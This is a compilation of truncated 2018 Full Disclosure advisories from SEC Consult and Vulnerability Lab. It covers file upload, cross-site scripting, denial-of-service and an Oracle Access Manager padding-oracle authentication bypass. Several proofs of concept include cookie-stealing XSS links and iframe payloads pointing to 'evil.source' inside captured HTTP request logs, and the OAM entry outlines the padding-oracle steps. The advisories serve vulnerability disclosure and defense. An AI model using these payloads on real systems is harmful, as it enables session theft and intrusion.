[FD] SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet

2018-05-14 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
===
  title: Arbitrary File Upload & Cross-site scripting
product: MyBiz MyProcureNet
 vulnerable version: 5.0.0
  fixed version: unknown
 CVE number: -
 impact: Critical
   homepage: http://www.mybiz.net/
  found: 2018-01-29
 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
 Fikri Fadzil (Office Singapore)
 Wan Ikram (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"MyBiz is a company fixated on developing technology which transforms the way
business is done online. At the intersection of what one business needs from
another is the potential for value to be created differently. This
intersection for the exchange of value requires technology but in
fundamentally very different ways from traditional enterprise systems. MyBiz
believes that the chemistry of business is the business relationships between
enterprises. The strength of the business relationship drives the success and
future of the business. MyBiz believes that these business relationships need
to be captured and orchestrated. MyBiz developed our proprietary Business
Relationship Network engine, a platform to capture business relationships as
data to drive new business services which create value efficiently."

Source: http://www.mybiz.net/copy-of-our-story


Business recommendation:

The vendor did not reply to our inquiries since February 2018 hence the issues
might still exist in current versions.

SEC Consult recommends not use this product until a thorough security review
has been performed by security professionals and all identified issues have
been resolved. It is assumed that MyBiz products are affected by further
critical security issues.


Vulnerability overview/description:
---
The identified vulnerabilities can be exploited after authentication but
the registration for the application is usually open for anyone.

1. Arbitrary File Upload
A malicious file can be uploaded to the webserver by an attacker. It is
possible for an attacker to upload a script to issue operating system
commands.

This vulnerability occurs because an attacker is able to adjust the
"HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary
extensions to the whitelist during the upload.

For instance, if the extension .asp is added to the
"HiddenFieldControlCustomWhiteListedExtensions" parameter, the server
accepts "secctest.asp" as legitimate file. Hence malicious files can be
uploaded in order to execute arbitrary commands to take over the server.


2. Reflected Cross-site scripting
This vulnerability within "ProxyPage.aspx" allows an attacker to inject
malicious client side scripting which will be executed in the browser of
users if they visit the manipulated site.


Proof of concept:
-
The proof of concept has been removed as no patch is available.


Vulnerable / tested versions:
-
MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. 
This
was the latest version available at the time of the test.


Vendor contact timeline:

2018-02-22: Contacting vendor through i...@mybiz.net (no response)
2018-02-27: Request update from vendor (no response)
2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us
(no response)
2018-05-14: Public release of security advisory


Solution:
-
None


Workaround:
---
None


Advisory URL:
-----
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC C

[FD] SEC Consult SA-20180503-0 :: Authentication Bypass in Oracle Access Manager (OAM)

2018-05-03 Thread SEC Consult Vulnerability Lab 
We have published an accompanying blog post to this technical advisory with
further information:

Blog:
https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/

Demo video: https://www.youtube.com/watch?v=YK7_1NozAwQ



SEC Consult Vulnerability Lab Security Advisory < 20180503-0 >
===
  title: Authentication Bypass
product: Oracle Access Manager
 vulnerable version: 11.1.2.3.0, 12.2.1.3.0
  fixed version: April 2018 CPU
 CVE number: CVE-2018-2879
 impact: Critical
   homepage: https://www.oracle.com/
  found: 2017-11
 by: W. Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Oracle Access Management provides innovative new services that complement
traditional access management capabilities. It not only provides Web SSO with
MFA, coarse grained authorization and session management but also provides
standard SAML Federation and OAuth capabilities to enable secure access to
external cloud and mobile applications. It can be easily integrated with the
Oracle Identity Cloud Service to support hybrid access management capabilities
that can help customers to seamlessly protect on-premise and cloud applications
and workloads."

URL: http://www.oracle.com/technetwork/middleware/id-mgmt/index-090417.html


Business recommendation:

SEC Consult did not conduct a full security audit as only a cryptographic
implementation was analyzed. However, since the vulnerability was found in such
a central component of the OAM, we suspect that an insufficient amount of
attention has been given to information security.

Given the central position in an organization's security infrastructure, we
recommend Oracle's customers to either conduct a full audit of the component
or to request the results of such audits from Oracle.

The security patches from the Oracle CPU April 2018 have to be applied
immediately!


Vulnerability overview/description:
---
Due to an improper usage of the CBC encryption mode, Oracle Access Manager (OAM)
is vulnerable to an authentication bypass vulnerability. An attacker can abuse
this vulnerability to log in to any resource protected by the OAM using any user
account, even administrative accounts! This security vulnerability completely
breaks the main functionality of the OAM product.

An attacker can create a scenario in which the OAM replies differently depending
on whether the PKCS#7 padding of an encrypted message is valid or invalid. This
behavior can be used to mount a padding oracle attack. An attacker can decrypt
and encrypt several messages used to communicate between the OAM and web
servers. The attack described here allows an attacker to create arbitrary
authentication cookies which are accepted by the OAM.


Proof of concept:
-
A successful user authentication with Oracle Access Manager (OAM) involves the
following steps:

1. The user accesses a protected resource.
2. A component in the web server (the Oracle Webgate) answers this request with
   a redirect to the OAM. An encrypted message ("encquery") is passed to the OAM
   in a URL parameter.
3. The user authenticates against the OAM (e.g. with username and password).
4. The OAM redirects the user back to the web server. Information about the
   successful login is passed in the parameter "encreply".
5. The web server redirects the user to the resource that was initially
   requested. An encrypted authentication token is stored in a cookie
   (OAMAuthnCookie).
6. The authentication token in the OAMAuthnCookie cookie is used from now on
   to authenticate the user.

All three encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted
with a CBC cipher using the same key. This key is shared between the OAM and the
web server.

The attack exploits step 2 of the authentication process: the attacker sends
manipulated "encquery" parameters and observes the server's response.

The following shows an example of a decrypted encquery:
salt=sF/vMVV0Gkr/k+IhbrXYWg== wh=agentid wu=%2F wo=1 rh=http://server: 
ru=%2F
reqtime=151000 ctx= validate=

where
* the "salt" is a randomly generated value
* "validate" is a hash over certain parts of the message (MD5)

To conduct a padding oracle attack, an attacker would modify the second last
encrypted block of an encrypted message. Most of the time, this causes the
padding in the decrypted message to be invalid. In case the padding is accepted,
the attacker gains information

[FD] SEC Consult SA-20180424-0 :: Reflected Cross-Site Scripting in multiple Zyxel ZyWALL products

2018-04-24 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180424-0 >
===
  title: Reflected Cross-Site Scripting
product: Zyxel ZyWALL: see "Vulnerable / tested version"
 vulnerable version: ZLD 4.30 and before
  fixed version: ZLD 4.31
 CVE number: -
 impact: Medium
   homepage: https://www.zyxel.com
  found: 2018-02-05
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.

We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml


Business recommendation:

SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.


Vulnerability overview/description:
---
1) Reflected Cross-Site Scripting (XSS)
A reflected cross-site scripting vulnerability was identified in
'free_time_failed.cgi' in the admin interface. The parameter 'err_msg' is
returned without any sanitization of the input. An attacker, for example,
can exploit this vulnerability to steal cookies from the attacked user in
order to hijack a session and gain access to the device.


Proof of concept:
-
1) Reflected Cross-Site Scripting (XSS)
By opening the following link, contents of the 'arip' and 'zy_pc_browser'
cookies will be displayed.

http:///free_time_failed.cgi?err_msg=alert(document.cookie);
https:///free_time_failed.cgi?err_msg=alert(document.cookie);


Vulnerable / tested versions:
-
The following versions are affected:
Zyxel ZyWall USG 110   ZLD 4.30 and earlier
Zyxel ZyWall USG 210   ZLD 4.30 and earlier
Zyxel ZyWall USG 310   ZLD 4.30 and earlier
Zyxel ZyWall USG 1100  ZLD 4.30 and earlier
Zyxel ZyWall USG 1900  ZLD 4.30 and earlier
Zyxel ZyWall USG 2200-VPN  ZLD 4.30 and earlier


Vendor contact timeline:

2018-02-07: Contacting vendor through secur...@zyxel.com.tw
2018-02-08: Vendor responded with contact information and a PGP key.
Sent the encrypted advisory to the contact.
2018-02-09: Contact confirmed that the advisory was received.
2018-02-16: Contact confirmed the vulnerability and stated that the ZyWALL 
series
is vulnerable to the reported vulnerability. The contact also stated
that the vulnerability will be fixed until the end of March.
Requested more information regarding version numbers and other
affected devices.
2018-02-23: Contact confirmed that the devices are vulnerable in firmware 
version
4.30 and before.
2018-03-21: Contact informed us that the new firmware version will be ZLD 4.31
and that it will be released on 2018-04-17. Shifted release of
advisory to 2018-04-17.
2018-04-12: Informed the contact that the advisory will be released in few days.
2018-04-17: Asked the vendor if ZLD 4.31 was released. Didn't find the new 
version
on the customer portal. E-mail was blocked and returned.
2018-04-18: Found the new version (ZLD 4.31) on the customer portal.
2018-04-24: Advisory release.


Solution:
-
Install firmware version ZLD 4.31 from the vendor's website to fix this issue:

https://www.zyxel.com/support/download_landing.shtml


Workaround:
---
Restrict network access to the device.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asi

[FD] SEC Consult SA-20180423-0 :: Multiple Stored XSS Vulnerabilities in WSO2 Carbon and Dashboard Server

2018-04-24 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
===
  title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
 vulnerable version: WSO2 Identity Server 5.3.0
  fixed version: WSO2 Identity Server 5.5.0
 CVE number: CVE-2018-8716
 impact: high
   homepage: https://wso2.com/products/dashboard
  found: 2017-12-13
 by: W. Schober (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"WSO2 Carbon redefines middleware by providing an integrated and componentized
middleware platform that adapts to the specific needs of any enterprise
IT project - on premise or in the cloud.
100% open source and standards-based, WSO2 Carbon enables developers to rapidly
orchestrate business processes, compose applications and develop services using
WSO2 Developer Studio and a broad range of business and technical services that
integrate with legacy, packaged and SaaS applications.
The lean, complete, OSGi-based platform includes more than 175 components – OSGi
bundles or Carbon features. The WSO2 Carbon core framework functions as
“Eclipse for servers” and includes common capabilities shared by all WSO2
products, such as built-in registry, user management, transports, security,
logging, clustering, caching and throttling services, co-ordination, and a
GUI framework."

Source: https://wso2.com/products/carbon/

"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to
rapidly create visually appealing and engaging web components such as
dashboards, and gadgets, and unlocking data for business intelligence and
monitoring. With the host of capabilities that Dashboard Server provides
out-of-the-box, going from data to screen has never been easier."

Source: https://wso2.com/products/dashboard-server/


Business recommendation:

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by the end-users to manage their accounts, change 
passwords,
alter their profiles, or change certain settings. An attacker is able to inject
arbitrary JavaScript payloads into various textboxes (username, home address,
lastname, firstname, etc).

The payloads are permanently stored in the dashboard and triggered every time 
the
dashboard is visited. The payload is also potentially triggered in the carbon
part of WSO2, which means that an attacker would be able to inject payloads
from the front-end application into a middleware application, which is not
accessible from the internet and attack administrators.

2) Stored Cross-Site Scripting in WSO2 Carbon
The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker
host URL an arbitrary JavaScript payload can be injected and permanently stored
in the web application.


Proof of concept:
-
1) Stored Cross-Site Scripting in WS02 Dashboard
The following input fields are vulnerable and JavaScript payloads can be 
directly
injected:
- Firstname
- Lastname
- Username
- Address

It is suspected, that all user inputs are returned unfiltered in all server 
responses.

2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and 
set
the URL to the following payload: ">

Everytime the carbon middleware application is accessed, the payload is 
triggered.


Vulnerable / tested versions:
-
The following version has been tested which was the most recent version
at the time of discovery:

* WSO2IS 5.3.0


Vendor contact timeline:

2018-01-25: Contacting vendor through secur...@wso2.com
2018-02-08: Asking for status update. Vendor responds, that they are
still investigating the issue.
2018-02-21: Vendor responds with release date and further details
concerning the nature of the vulnerabilities. The XSS in the
Carbon component was a duplicate and should be already fixed.
Concerning the XSS in the dashboard a fix is implemented
and will be rolled out with the release of WSO2 Identity
Server 5.5.0.
2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
2018-03-15: Mitre assigned CVE-2018-8716.
2018-03-26: Vendor informed us, that the final release of the updated
software will be o

[FD] Microsoft Skype Mobile v81.2 & v8.13 - Remote Denial of Service Vulnerability

2018-03-27 Thread Vulnerability Lab 
ching inside by a resize of the image (view 
demo vide)
8. Now the message with the smilies must be quoted or copied and then 
transfered to any other skype input field were smilies are supported
9. Pasting around 50 of them results in an unexpected memory errors and 
uncaught exceptions or access violations
Note: Tested for Android Samsung and Apple iOS. The resize of the larger image 
results in a memory corruption
10. Successful reproduce of the vulnerability!


PoC Video: Shows the local issue and the remote triggered bug ...
https://www.youtube.com/watch?v=2vcdQb98zE0


Solution - Fix & Patch:
===
Secure memory allocation when resizing emoticons images during rendering in 
transfers through the skype mobile software client.
Microsoft resolved the vulnerability and prepared an updated version v8.17 & 
v8.18. In both versions the security issue is known as patched.


Security Risk:
==
The security risk of the vulnerability in the skype mobile software client for 
ios and android is estimated as medium (cvss 4.7).


Credits & Authors:
==
Benjamin Kunz Mejri [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
- www.evolution-sec.com
Section:magazine.vulnerability-lab.com  - 
vulnerability-lab.com/contact.php - 
evolution-sec.com/contact
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get a ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities

2018-03-27 Thread Vulnerability Lab 
r[https://cpshop.localhost:8080admin.php]
  Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; 
log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; 
language=de; cookieconsent_dismissed=yes]
  Connection[keep-alive]
   Response Header:
  server[Apache/2.4.27]
  x-powered-by[PHP/7.0.20]
  expires[Thu, 19 Nov 1981 08:52:00 GMT]
  cache-control[no-store, no-cache, must-revalidate]
  pragma[no-cache]
  x-frame-options[SAMEORIGIN]
  content-encoding[gzip]
  set-cookie[language=de; expires=Tue, 20-Feb-2018 13:00:40 GMT; 
Max-Age=259200; path=/]
  content-type[text/html; charset=utf-8]
  X-Firefox-Spdy[h2]
-
Status: 302[Found]
GET https://cpshop.localhost:8080/evil.source
Mime Type[text/html]
   Request Header:
  Host[cpshop.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) 
Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate, br]
  Referer[https://cpshop.localhost:8080admin.php]
  Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; 
log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; 
language=de; cookieconsent_dismissed=yes]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  server[Apache/2.4.27]
  location[http://cpshop.localhost:8080]
  content-length[296]
  content-type[text/html; charset=iso-8859-1]
  X-Firefox-Spdy[h2]
-
Status: pending[]
GET 
http://cpshop.localhost:8080/cpshop/admin.php?file=news&clean=yes&ajax=yes&form%5Bsearch%5D=
http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2B
onl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news 
Mime Type[unknown]
   Request Header:
  Host[cpshop.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) 
Gecko/20100101 Firefox/56.0]
  Accept[*/*]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  X-Requested-With[XMLHttpRequest]
  Referer[http://cpshop.localhost:8080/cpshop/admin.php]
  Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; 
language=de]
  DNT[1]
-
14:06:37.847[179ms][total 538ms] Status: 200[OK]
GET 
http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2Bonl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news
 
Mime Type[text/html]
   Request Header:
  Host[cpshop.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) 
Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  Referer[http://cpshop.localhost:8080/cpshop/admin.php]
  Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; 
language=de]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache/2.4.27]
  X-Powered-By[PHP/7.0.20]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate]
  Pragma[no-cache]
  X-Frame-Options[SAMEORIGIN]
  Content-Encoding[gzip]
  Set-Cookie[language=de; expires=Tue, 20-Feb-2018 13:06:37 GMT; 
Max-Age=259200; path=/]
  Upgrade[h2c]
  Connection[Upgrade, Keep-Alive]
  Keep-Alive[timeout=5, max=100]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=utf-8]


Reference(s):
http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=
http://cpshop.localhost:8080/cpshop/admin.php#!file=help&mode=search&search=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]=
http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=


Solution - Fix & Patch:
===
The cross site vulnerabilities can be resolved by implementation of 
htmlentities and a secure input restriction of characters.



Security Risk:
==
The security risk of the client-side cross site scripting web vulnerabilities 
in the web-application are estimated as medium (cvss 3.4).


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerabil

[FD] Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities

2018-03-27 Thread Vulnerability Lab 
024.000]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   POST-Daten:
  action[editOptionsProject]
  path[%2Fimg-src-x-img-img-src-x-img-]
  
title[%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.domain%29%3E%2520%
  
22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.cookie%29%3E]
  pathProjectGlobal[%2Fdefault-wGlobal]
  pathProjectLayout[]
  language[br]
  projectConnect[%2Fimg-src-x-img-img-src-x-img-]
  hostOnly[]
  
pageOffline[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Foffline.php]
  
permissionDenied[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Fpermission-denied.php]
  W_PRETMP_groups%5B%5D[%5BW_ID%5D]
  backupGroup[]
   Response Header:
  Server[Apache/2.4.27]
  X-Powered-By[PHP/7.0.20]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate]
  Vary[Accept-Encoding]
  Keep-Alive[timeout=5, max=100]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET 
https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-
 
Mime Type[text/html]
   Request Header:
  Host[grid.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) 
Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Referer[https://grid.localhost:8080/weblication/grid5/apps/wEditorWd8/index.php?action=showfileedit&path=/default-wGlobal/
  
wGlobal/content/variables/default.wVariables.php&target=be&referrer=/de/index.php&display=default&editsource=&hasPlaceholdersToInsert=0]
  Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; 
lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache/2.4.27]
  X-Powered-By[PHP/7.0.20]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate]
  Pragma[no-cache]
  Content-Encoding[gzip]
  Vary[Accept-Encoding]
  Keep-Alive[timeout=5, max=97]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET 
https://grid.localhost:8080/weblication/grid5/scripts/wEventmanager.php?action=showEvents&path=/img-src-x-img-img-src-x-img-&type=project&target=embed
 
Mime Type[text/html]
   Request Header:
  Host[grid.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) 
Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Referer[https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-]
  Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; 
lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache/2.4.27]
  X-Powered-By[PHP/7.0.20]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate]
  Pragma[no-cache]
  Keep-Alive[timeout=5, max=96]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]


Reference(s):
https://grid.localhost:8080/
https://grid.localhost:8080/weblication/
https://grid.localhost:8080/weblication/grid5/
https://grid.localhost:8080/weblication/grid5/scripts/
https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php


Solution - Fix & Patch:
===
The vulnerability can be resolved by a sanitize of the delivered input through 
the wFilemanager.php file.
Parse in the output location the execution point in the Inhaltsprojekte to 
resolve the issue.


Security Risk:
==
The security risk of the persistent cross site scripting vulnerability in the 
web-application is estimated as medium (cvss 3.5).



Credits & Authors:
==
Benjamin K.M. [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some s

[FD] AEF CMS v1.0.9 - (PM) Persistent Cross Site Scripting Vulnerability

2018-03-27 Thread Vulnerability Lab 
;ucpact=sendsaved&pmid=1]
  Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; 
AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   POST-Daten:
  pmrecipients[admin]
  pmsubject[test]
  
pmbody[This+is+a+private+test+message+with+payload+in+the+ftp+link%0D%0A%0D%0A]
  postcode[yerudyyk4joz8ea5]
  pmsaveinsentitems[on]
  sendpm[Send+PM]
   Response Header:
  Server[Apache]
  X-Powered-By[PHP/5.4.45]
  Content-Length[217]
  Content-Type[text/html; charset=ISO-8859-1]
-
Status: 200[OK]
GET https://aeforums.localhost:8000/AEF/evil.source 
Mime Type[text/html]
   Request Header:
  Host[aeforums.localhost:8000]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) 
Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Referer[https://aeforums.localhost:8000/AEF/index.php?act=usercp&ucpact=sendsaved&pmid=1]
  Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; 
AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache]
  Accept-Ranges[bytes]
  Content-Length[431]
  Content-Type[text/html; charset=UTF-8]


Reference(s):
https://aeforums.localhost:8000/AEF/
https://aeforums.localhost:8000/AEF/index.php


Solution - Fix & Patch:
===
The security vulnerability can be patched by a sanitize of the ftp link element 
input field in the private message module.
Parse in the editor the output location for the link to prevent the execution 
point of the issue. 


Security Risk:
==
The security risk of the persistent cross site scripting web vulnerability in 
the open-source web-application is estimated as medium (cvss 4.4).


Credits & Authors:
==
Benjamin K.M. [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
